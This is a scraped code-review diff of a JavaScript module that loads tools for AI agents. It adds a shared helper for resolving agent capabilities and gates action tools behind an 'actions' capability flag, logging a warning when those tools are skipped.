* @returns {Promise<Set<string>>}
|
||||||
|
*/
|
||||||
|
async function resolveAgentCapabilities(req, appConfig, agentId) {
|
||||||
|
const endpointsConfig = await getEndpointsConfig(req);
|
||||||
|
let capabilities = new Set(endpointsConfig?.[EModelEndpoint.agents]?.capabilities ?? []);
|
||||||
|
if (capabilities.size === 0 && isEphemeralAgentId(agentId)) {
|
||||||
|
capabilities = new Set(
|
||||||
|
appConfig.endpoints?.[EModelEndpoint.agents]?.capabilities ?? defaultAgentCapabilities,
|
||||||
|
);
|
||||||
|
}
|
||||||
|
return capabilities;
|
||||||
|
}
|
||||||
|
|
||||||
/**
|
/**
|
||||||
* Processes the required actions by calling the appropriate tools and returning the outputs.
|
* Processes the required actions by calling the appropriate tools and returning the outputs.
|
||||||
* @param {OpenAIClient} client - OpenAI or StreamRunManager Client.
|
* @param {OpenAIClient} client - OpenAI or StreamRunManager Client.
|
||||||
|
|
@ -446,17 +465,11 @@ async function loadToolDefinitionsWrapper({ req, res, agent, streamId = null, to
|
||||||
}
|
}
|
||||||
|
|
||||||
const appConfig = req.config;
|
const appConfig = req.config;
|
||||||
const endpointsConfig = await getEndpointsConfig(req);
|
const enabledCapabilities = await resolveAgentCapabilities(req, appConfig, agent.id);
|
||||||
let enabledCapabilities = new Set(endpointsConfig?.[EModelEndpoint.agents]?.capabilities ?? []);
|
|
||||||
|
|
||||||
if (enabledCapabilities.size === 0 && isEphemeralAgentId(agent.id)) {
|
|
||||||
enabledCapabilities = new Set(
|
|
||||||
appConfig.endpoints?.[EModelEndpoint.agents]?.capabilities ?? defaultAgentCapabilities,
|
|
||||||
);
|
|
||||||
}
|
|
||||||
|
|
||||||
const checkCapability = (capability) => enabledCapabilities.has(capability);
|
const checkCapability = (capability) => enabledCapabilities.has(capability);
|
||||||
const areToolsEnabled = checkCapability(AgentCapabilities.tools);
|
const areToolsEnabled = checkCapability(AgentCapabilities.tools);
|
||||||
|
const actionsEnabled = checkCapability(AgentCapabilities.actions);
|
||||||
const deferredToolsEnabled = checkCapability(AgentCapabilities.deferred_tools);
|
const deferredToolsEnabled = checkCapability(AgentCapabilities.deferred_tools);
|
||||||
|
|
||||||
const filteredTools = agent.tools?.filter((tool) => {
|
const filteredTools = agent.tools?.filter((tool) => {
|
||||||
|
|
@ -469,7 +482,10 @@ async function loadToolDefinitionsWrapper({ req, res, agent, streamId = null, to
|
||||||
if (tool === Tools.web_search) {
|
if (tool === Tools.web_search) {
|
||||||
return checkCapability(AgentCapabilities.web_search);
|
return checkCapability(AgentCapabilities.web_search);
|
||||||
}
|
}
|
||||||
if (!areToolsEnabled && !tool.includes(actionDelimiter)) {
|
if (tool.includes(actionDelimiter)) {
|
||||||
|
return actionsEnabled;
|
||||||
|
}
|
||||||
|
if (!areToolsEnabled) {
|
||||||
return false;
|
return false;
|
||||||
}
|
}
|
||||||
return true;
|
return true;
|
||||||
|
|
@ -481,7 +497,7 @@ async function loadToolDefinitionsWrapper({ req, res, agent, streamId = null, to
|
||||||
|
|
||||||
/** @type {Record<string, Record<string, string>>} */
|
/** @type {Record<string, Record<string, string>>} */
|
||||||
let userMCPAuthMap;
|
let userMCPAuthMap;
|
||||||
if (hasCustomUserVars(req.config)) {
|
if (agent.tools?.some((t) => t.includes(Constants.mcp_delimiter))) {
|
||||||
userMCPAuthMap = await getUserMCPAuthMap({
|
userMCPAuthMap = await getUserMCPAuthMap({
|
||||||
tools: agent.tools,
|
tools: agent.tools,
|
||||||
userId: req.user.id,
|
userId: req.user.id,
|
||||||
|
|
@ -766,6 +782,7 @@ async function loadToolDefinitionsWrapper({ req, res, agent, streamId = null, to
|
||||||
toolContextMap,
|
toolContextMap,
|
||||||
toolDefinitions,
|
toolDefinitions,
|
||||||
hasDeferredTools,
|
hasDeferredTools,
|
||||||
|
actionsEnabled,
|
||||||
};
|
};
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|
@ -809,14 +826,7 @@ async function loadAgentTools({
|
||||||
}
|
}
|
||||||
|
|
||||||
const appConfig = req.config;
|
const appConfig = req.config;
|
||||||
const endpointsConfig = await getEndpointsConfig(req);
|
const enabledCapabilities = await resolveAgentCapabilities(req, appConfig, agent.id);
|
||||||
let enabledCapabilities = new Set(endpointsConfig?.[EModelEndpoint.agents]?.capabilities ?? []);
|
|
||||||
/** Edge case: use defined/fallback capabilities when the "agents" endpoint is not enabled */
|
|
||||||
if (enabledCapabilities.size === 0 && isEphemeralAgentId(agent.id)) {
|
|
||||||
enabledCapabilities = new Set(
|
|
||||||
appConfig.endpoints?.[EModelEndpoint.agents]?.capabilities ?? defaultAgentCapabilities,
|
|
||||||
);
|
|
||||||
}
|
|
||||||
const checkCapability = (capability) => {
|
const checkCapability = (capability) => {
|
||||||
const enabled = enabledCapabilities.has(capability);
|
const enabled = enabledCapabilities.has(capability);
|
||||||
if (!enabled) {
|
if (!enabled) {
|
||||||
|
|
@ -833,6 +843,7 @@ async function loadAgentTools({
|
||||||
return enabled;
|
return enabled;
|
||||||
};
|
};
|
||||||
const areToolsEnabled = checkCapability(AgentCapabilities.tools);
|
const areToolsEnabled = checkCapability(AgentCapabilities.tools);
|
||||||
|
const actionsEnabled = checkCapability(AgentCapabilities.actions);
|
||||||
|
|
||||||
let includesWebSearch = false;
|
let includesWebSearch = false;
|
||||||
const _agentTools = agent.tools?.filter((tool) => {
|
const _agentTools = agent.tools?.filter((tool) => {
|
||||||
|
|
@ -843,7 +854,9 @@ async function loadAgentTools({
|
||||||
} else if (tool === Tools.web_search) {
|
} else if (tool === Tools.web_search) {
|
||||||
includesWebSearch = checkCapability(AgentCapabilities.web_search);
|
includesWebSearch = checkCapability(AgentCapabilities.web_search);
|
||||||
return includesWebSearch;
|
return includesWebSearch;
|
||||||
} else if (!areToolsEnabled && !tool.includes(actionDelimiter)) {
|
} else if (tool.includes(actionDelimiter)) {
|
||||||
|
return actionsEnabled;
|
||||||
|
} else if (!areToolsEnabled) {
|
||||||
return false;
|
return false;
|
||||||
}
|
}
|
||||||
return true;
|
return true;
|
||||||
|
|
@ -860,8 +873,7 @@ async function loadAgentTools({
|
||||||
|
|
||||||
/** @type {Record<string, Record<string, string>>} */
|
/** @type {Record<string, Record<string, string>>} */
|
||||||
let userMCPAuthMap;
|
let userMCPAuthMap;
|
||||||
//TODO pass config from registry
|
if (agent.tools?.some((t) => t.includes(Constants.mcp_delimiter))) {
|
||||||
if (hasCustomUserVars(req.config)) {
|
|
||||||
userMCPAuthMap = await getUserMCPAuthMap({
|
userMCPAuthMap = await getUserMCPAuthMap({
|
||||||
tools: agent.tools,
|
tools: agent.tools,
|
||||||
userId: req.user.id,
|
userId: req.user.id,
|
||||||
|
|
@ -949,13 +961,15 @@ async function loadAgentTools({
|
||||||
|
|
||||||
agentTools.push(...additionalTools);
|
agentTools.push(...additionalTools);
|
||||||
|
|
||||||
if (!checkCapability(AgentCapabilities.actions)) {
|
const hasActionTools = _agentTools.some((t) => t.includes(actionDelimiter));
|
||||||
|
if (!hasActionTools) {
|
||||||
return {
|
return {
|
||||||
toolRegistry,
|
toolRegistry,
|
||||||
userMCPAuthMap,
|
userMCPAuthMap,
|
||||||
toolContextMap,
|
toolContextMap,
|
||||||
toolDefinitions,
|
toolDefinitions,
|
||||||
hasDeferredTools,
|
hasDeferredTools,
|
||||||
|
actionsEnabled,
|
||||||
tools: agentTools,
|
tools: agentTools,
|
||||||
};
|
};
|
||||||
}
|
}
|
||||||
|
|
@ -971,6 +985,7 @@ async function loadAgentTools({
|
||||||
toolContextMap,
|
toolContextMap,
|
||||||
toolDefinitions,
|
toolDefinitions,
|
||||||
hasDeferredTools,
|
hasDeferredTools,
|
||||||
|
actionsEnabled,
|
||||||
tools: agentTools,
|
tools: agentTools,
|
||||||
};
|
};
|
||||||
}
|
}
|
||||||
|
|
@ -1103,6 +1118,7 @@ async function loadAgentTools({
|
||||||
userMCPAuthMap,
|
userMCPAuthMap,
|
||||||
toolDefinitions,
|
toolDefinitions,
|
||||||
hasDeferredTools,
|
hasDeferredTools,
|
||||||
|
actionsEnabled,
|
||||||
tools: agentTools,
|
tools: agentTools,
|
||||||
};
|
};
|
||||||
}
|
}
|
||||||
|
|
@ -1120,9 +1136,11 @@ async function loadAgentTools({
|
||||||
* @param {AbortSignal} [params.signal] - Abort signal
|
* @param {AbortSignal} [params.signal] - Abort signal
|
||||||
* @param {Object} params.agent - The agent object
|
* @param {Object} params.agent - The agent object
|
||||||
* @param {string[]} params.toolNames - Names of tools to load
|
* @param {string[]} params.toolNames - Names of tools to load
|
||||||
|
* @param {Map} [params.toolRegistry] - Tool registry
|
||||||
* @param {Record<string, Record<string, string>>} [params.userMCPAuthMap] - User MCP auth map
|
* @param {Record<string, Record<string, string>>} [params.userMCPAuthMap] - User MCP auth map
|
||||||
* @param {Object} [params.tool_resources] - Tool resources
|
* @param {Object} [params.tool_resources] - Tool resources
|
||||||
* @param {string|null} [params.streamId] - Stream ID for web search callbacks
|
* @param {string|null} [params.streamId] - Stream ID for web search callbacks
|
||||||
|
* @param {boolean} [params.actionsEnabled] - Whether the actions capability is enabled
|
||||||
* @returns {Promise<{ loadedTools: Array, configurable: Object }>}
|
* @returns {Promise<{ loadedTools: Array, configurable: Object }>}
|
||||||
*/
|
*/
|
||||||
async function loadToolsForExecution({
|
async function loadToolsForExecution({
|
||||||
|
|
@ -1135,11 +1153,17 @@ async function loadToolsForExecution({
|
||||||
userMCPAuthMap,
|
userMCPAuthMap,
|
||||||
tool_resources,
|
tool_resources,
|
||||||
streamId = null,
|
streamId = null,
|
||||||
|
actionsEnabled,
|
||||||
}) {
|
}) {
|
||||||
const appConfig = req.config;
|
const appConfig = req.config;
|
||||||
const allLoadedTools = [];
|
const allLoadedTools = [];
|
||||||
const configurable = { userMCPAuthMap };
|
const configurable = { userMCPAuthMap };
|
||||||
|
|
||||||
|
if (actionsEnabled === undefined) {
|
||||||
|
const enabledCapabilities = await resolveAgentCapabilities(req, appConfig, agent?.id);
|
||||||
|
actionsEnabled = enabledCapabilities.has(AgentCapabilities.actions);
|
||||||
|
}
|
||||||
|
|
||||||
const isToolSearch = toolNames.includes(AgentConstants.TOOL_SEARCH);
|
const isToolSearch = toolNames.includes(AgentConstants.TOOL_SEARCH);
|
||||||
const isPTC = toolNames.includes(AgentConstants.PROGRAMMATIC_TOOL_CALLING);
|
const isPTC = toolNames.includes(AgentConstants.PROGRAMMATIC_TOOL_CALLING);
|
||||||
|
|
||||||
|
|
@ -1196,7 +1220,6 @@ async function loadToolsForExecution({
|
||||||
const actionToolNames = allToolNamesToLoad.filter((name) => name.includes(actionDelimiter));
|
const actionToolNames = allToolNamesToLoad.filter((name) => name.includes(actionDelimiter));
|
||||||
const regularToolNames = allToolNamesToLoad.filter((name) => !name.includes(actionDelimiter));
|
const regularToolNames = allToolNamesToLoad.filter((name) => !name.includes(actionDelimiter));
|
||||||
|
|
||||||
/** @type {Record<string, unknown>} */
|
|
||||||
if (regularToolNames.length > 0) {
|
if (regularToolNames.length > 0) {
|
||||||
const includesWebSearch = regularToolNames.includes(Tools.web_search);
|
const includesWebSearch = regularToolNames.includes(Tools.web_search);
|
||||||
const webSearchCallbacks = includesWebSearch ? createOnSearchResults(res, streamId) : undefined;
|
const webSearchCallbacks = includesWebSearch ? createOnSearchResults(res, streamId) : undefined;
|
||||||
|
|
@ -1227,7 +1250,7 @@ async function loadToolsForExecution({
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
if (actionToolNames.length > 0 && agent) {
|
if (actionToolNames.length > 0 && agent && actionsEnabled) {
|
||||||
const actionTools = await loadActionToolsForExecution({
|
const actionTools = await loadActionToolsForExecution({
|
||||||
req,
|
req,
|
||||||
res,
|
res,
|
||||||
|
|
@ -1237,6 +1260,11 @@ async function loadToolsForExecution({
|
||||||
actionToolNames,
|
actionToolNames,
|
||||||
});
|
});
|
||||||
allLoadedTools.push(...actionTools);
|
allLoadedTools.push(...actionTools);
|
||||||
|
} else if (actionToolNames.length > 0 && agent && !actionsEnabled) {
|
||||||
|
logger.warn(
|
||||||
|
`[loadToolsForExecution] Capability "${AgentCapabilities.actions}" disabled. ` +
|
||||||
|
`Skipping action tool execution. User: ${req.user.id} | Agent: ${agent.id} | Tools: ${actionToolNames.join(', ')}`,
|
||||||
|
);
|
||||||
}
|
}
|
||||||
|
|
||||||
if (isPTC && allLoadedTools.length > 0) {
|
if (isPTC && allLoadedTools.length > 0) {
|
||||||
|
|
@ -1397,4 +1425,5 @@ module.exports = {
|
||||||
loadAgentTools,
|
loadAgentTools,
|
||||||
loadToolsForExecution,
|
loadToolsForExecution,
|
||||||
processRequiredActions,
|
processRequiredActions,
|
||||||
|
resolveAgentCapabilities,
|
||||||
};
|
};
|
||||||
|
|
|
||||||
Some files were not shown because too many files have changed in this diff Show more
Loading…
Add table
Add a link
Reference in a new issue